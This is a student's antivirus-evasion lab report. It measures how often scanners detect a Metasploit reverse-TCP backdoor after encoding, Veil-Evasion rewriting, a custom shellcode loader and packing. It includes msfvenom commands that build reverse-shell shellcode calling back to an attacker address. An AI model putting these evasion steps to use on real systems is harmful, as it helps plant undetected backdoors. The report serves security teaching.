2017-2018 Exp3 MAL_免杀原理与实践 20155214

Exp3 MAL_免杀原理与实践

本次实验操使用Virustotal，VirScan作为测试平台，尝试通过Veil-Evasion重新，交叉编译，加壳等方式逃过杀软检测。

---

目录

• Exp3 MAL_免杀原理与实践
  • 实验内容
    • 对msf生成后门程序的检测
      • Virustotal测试Ⅰ
      • Visscan测试Ⅰ
      • n次编码影响测试
    • Veil-Evasion应用
      • Virscan测试
    • Visual Studio2017 + shellcode生成后门
      • shellcode进化
    • 主要思路
  • 知识点
    • 最后的进化--加壳
  • 启发
    • 对于反杀

实验内容

实验环境 Kali linux 64bit（虚拟机）

实验工具Virustotal，VirScan，Visual Studio

---

对msf生成后门程序的检测

采用Exp2中msf平台生成的反弹端口后门Hearthstone_backdoor.exe作为第一版对比。

Virustotal测试Ⅰ

Virustotal集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

由上图可见，

File Name: Hearthstone_backdoor.exe
Detection Ratio: 21/66 

报毒率比想象中低了一些，不过依旧是被主流杀软报毒了。

Visscan测试Ⅰ

Visscan中的 ++文件行为分析++ 很实用，毕竟是中文很亲切。

行为描述:
建立到一个指定的套接字连接
详情信息:
IP: **.168.233.**:4444, SOCKET = 0x000000c4

行为描述:
修改注册表
删除注册表键值
删除注册表键

基本上查出了后台的反弹端口特征。

n次编码影响测试

n = 8时，如图示Visscan给出警告，但没有文件行为分析！

VirusTotal分析结果:

File Name: Hearthstone_backdoor_encoded8.exe
Detection Ratio: 19/66 

Veil-Evasion应用

Veil-Evasion是用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter，然后再通过不同方式编译成exe，共性特征比较少。

++安装方法见知识点++

 Language:		powershell
 Payload:		powershell/meterpreter/rev_tcp
 Required Options:      LHOST=192.168.xxx.xxx  LPORT=4444

可以看到Veil-Evasion提供不同的编程语言以及payload对后门进行封装。

	Rating:		c/python = Excellent ruby/go = normal
	Description:    pure windows/meterpreter/reverse_tcp stager, no
	                shellcode

Virscan测试

• ruby
  

Rating: 3/39
//效果客观

• powershell
  
  大兄弟还没测试就被电脑管家查出来了……
  

Rating: 5/39

Visual Studio2017 + shellcode生成后门

生成一个c语言格式的Shellcode数组

root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=xxx -f c

设计程序系统调用该shellcode数组

运行结果——成功√

Windows Defender + 电脑管家 无报毒

Rating: 5/39

shellcode进化

root@Kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 12 LHOST=192.168.119.130 LPORT=443 -f c
//尝试两种编码 + 重编12次

实测连接成功√

• virscan测试 效果极佳

Rating: 2/39

主要思路

Tip:

本次实验，主机通过设计反弹端口攻击，达到获取被控机权限的目的。

---

知识点

Kali下安装Veil-Evasion

//安装git：
sudo apt-get -y install git

//git命令行下载Veil Evasion：
git clone https://github.com/Veil-Framework/Veil-Evasion.git

//把它移动到opt目录下（可选）：
mv Veil-Evasion /opt

//进入Veil Evasion所在目录：
cd /opt/Veil-Evasion/

//启动setup脚本开始安装：
bash setup/setup.sh -s

最后的进化--加壳

尝试用ASPack加密Hearthstone_backdoor.exe

压缩后，文件由17.5MB压缩至11.7MB
Rating: 4/39

效果惊人，怪不得冰河用的ASPack压缩。

加密壳Hyperion,在Kali里有hyperion的实现,将shellcode_v2用Veil-Evasion中的Hyperion组件加壳

Rating: 12/39

• 事实证明，加壳软件起了反作用…
• 大部分AV应该都增加了壳检测（凉

---

启发

本次实验给我的启发是，网络环境并没有想象中那么安全，杀软的检测并没有想象的完备。

对于反杀

NOTE:

一个后台程序，通过不同的平台和编码方式，以及重编码，可以减少特征码被检测率。